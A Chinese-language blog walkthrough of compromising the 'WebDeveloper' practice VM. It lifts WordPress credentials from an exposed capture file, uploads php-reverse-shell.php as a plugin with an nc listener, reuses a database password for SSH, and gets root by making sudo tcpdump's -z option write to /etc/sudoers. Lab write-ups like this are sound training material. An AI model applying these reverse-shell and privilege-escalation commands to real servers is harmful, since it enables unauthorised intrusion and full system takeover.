发布于 

WebDeveloper 靶机渗透

WebDeveloper 靶机渗透

WebDeveloper 靶机

确定主机 ip

arp-scan -l

信息收集

主机、端口扫描

root@kali:~# nmap -sS -Pn -A -p- 192.168.220.167 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 23:31 EDT 
Nmap scan report for 192.168.220.167 (192.168.220.167) 
Host is up (0.00070s latency).
 Not shown: 65533 closed ports 
 PORT STATE SERVICE VERSION 22/tcp open ssh 
 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 
 | ssh-hostkey: 
 | 2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA) 
 | 256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA) 
 |_ 256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519) 
 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 
 |_http-generator: WordPress 4.9.8 
 |_http-server-header: Apache/2.4.29 (Ubuntu) 
 |_http-title: Example site – Just another WordPress site 
 MAC Address: 00:0C:29:27:68:CC (VMware) 
 Device type: general purpose 
 Running: Linux 3.X|4.X 
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 
 OS details: Linux 3.2 - 4.9 
 Network Distance: 1 hop 
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 
 TRACEROUTE 
 HOP RTT ADDRESS 1 0.70 ms 192.168.220.167 (192.168.220.167) 
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
 Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds

扫描结果

端口 信息
22 OpenSSH 7.6p1 Ubuntu 4
80 WordPress 4.9.8 网站系统

80 端口网站

网站目录扫描
dirb http://192.168.220.167/

发现 wordpress 的后台,还发现了一个 ipdata 目录打开之后是一个 wireshark 的数据包文 件,直接点击用 wireshark 打开(OK 按钮点亮需要切换到 Save File 再回到 Open)

使用 wireshark 分析数据包,可以发现 wordpress 登录的用户名和密码

Form item: "log" = "webdeveloper"
Form item: "pwd" = "Te5eQg&4sBS!Yr$)wf%(DcAd"
登录 wordpress 后台成功:http://192.168.220.167/wp-login.php
发现后台的样式中 404.php,这里修改为 shell 代码应该可以 getshell。(后面测试没成功)

漏洞扫描

可以对发现的端口进行破解

端口功能 实施攻击
22 端口 SSH 暴力破解
80 端口网站 已经拿到后台用户名和密码,只需找到漏洞 getshell

22 端口 SSH 破解

尝试获取到的用户名和密码进行登录 ssh,发现不能登录 webdeveloper Te5eQg&4sBS!Yr$)wf%(DcAd

80 端口 wordpress 网站漏洞扫描

Wordpress 常见漏洞分类:

1. 插件漏洞,样式漏洞(样式 404.php 页面) 
2. 各种上传点: 上传插件,上传主题样式,媒体处上传文件

使用 wpscan 扫描网站漏洞,结果出乎意料,没有识别出 wordpress.

过了一段时间回来再次扫描,发现又可以了。。。,枚举一下插件、样式漏洞、后台用户名

wpscan --url http://192.168.220.167/ -e
只找到一个后台用户名,其他没有任何收获

使用 searchsploit 搜索 wordpress 漏洞,因为大多数情况下 wordpress 漏洞都在于插件, 查看后台插件:

搜索插件漏洞:只有一个,没有什么太大价值

上传插件试试,在插件列表上面点击 Add New,增加插件,再点击更新插件(UpdatePlugin)

漏洞利用

利用 wordpress 后台 404.php 页面 GetShell 失败

登录后台找到 404.php 页面,修改代码

修改代码为 php-reverse-shell.php

修改代码中的 ip 地址以及端口,ip 为 kali 的,端口为 nc 监听的端口

修改完之后,更新文件,发现提示不能更新…

利用 wordpress 后台插件上传 GetShell

刚刚已经上传过文件,虽然提示有错误,但是心存侥幸,使用 dirb 重新扫描一下目录

发现了上传目录:
[http://192.168.220.167/wp-content/uploads/](http://192.168.220.167/wp-content/uploads/) 查看:

点开目录发现文件是在的

剩下的就是惯例拿 shell

  1. 使用 nc 监听 nc -lvp 1234
  2. 访问上传的文件 php-reverse-shell.php http://192.168.220.167/wp-content/uploads/2020/05/php-reverse-shell.php
  3. python 切换 bash, python -c 'import pty; pty.spawn("/bin/bash")'

需要使用命令:

python3 -c 'import pty; pty.spawn("/bin/bash")'

4. 查看网站源码敏感信息

结合 ls 命令查看文件夹,最终找到网站根目录:/var/www/html
查看网站配置文件 wp-config.php

得到数据库密码:MasterOfTheUniverse
使用这个密码尝试登录 ssh,成功登录

提权

利用 SUID 权限程序提权失败

查找可以利用的 SUID 权限程序
find / -user root -perm -4000 -print 2>/dev/null
暂时没有发现可以利用的点(常见可利用程序:nmap,vim,find,bash,more,less,nano,cp)

利用 sudo 程序提权

使用 sudo -l 查看权限

可以看到在 webdevelopershell 中可以使用 sudo 直接以 root 权限启动 tcpdump 查看 tcpdump 命令帮助

-z 命令可以执行任意命令, -Z 可以指定用户
我们只需构造一个将当前用户添加为 root 权限的脚本,用 tcpdump 执行即可

  1. 制作将当前用户添加为 root 权限的脚本 echo 'echo "webdeveloper ALL=(ALL:ALL) ALL" >> /etc/sudoers' > /tmp/exp.sh
  2. 修改脚本权限 chmod +x /tmp/exp.sh
  3. 使用 tcpdump 执行脚本
    sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp.sh -Z root
    命令解释
    -i eth0 从指定网卡捕获数据包
    -w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
    -z [command] 运行指定的命令
    -Z [user] 指定用户执行命令
    -G [rotate_seconds]rotate_seconds 秒一次的频率执行-w 指定的转储
    -W [num] 指定抓包数量
  4. 使用 sudo 查看/root 文件夹以及 flag
  5. 修改/etc/shadow 文件中的 root 密码 hash sudo vim /etc/shadow

切换到 root 用户,密码:MasterOfTheUniverse

小结

本节使用了以下工具:
arp-scan,nmap,dirb,wpscan,nc,tcpdump
本节涉及的漏洞:文件上传漏洞,目录遍历漏洞,权限配置问题漏洞
本节涉及的失败:
ssh 暴力破解失败
wordpress 后台 404.php 利用失败
利用 SUID 权限程序提权失败

领悟小结:

当没有思路时,请继续信息收集 多次尝试重新漏洞利用说不定有意外发现 失败不可怕,可怕的是失败了就放弃了
许可协议

本文采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。

分享文章
快来参与讨论吧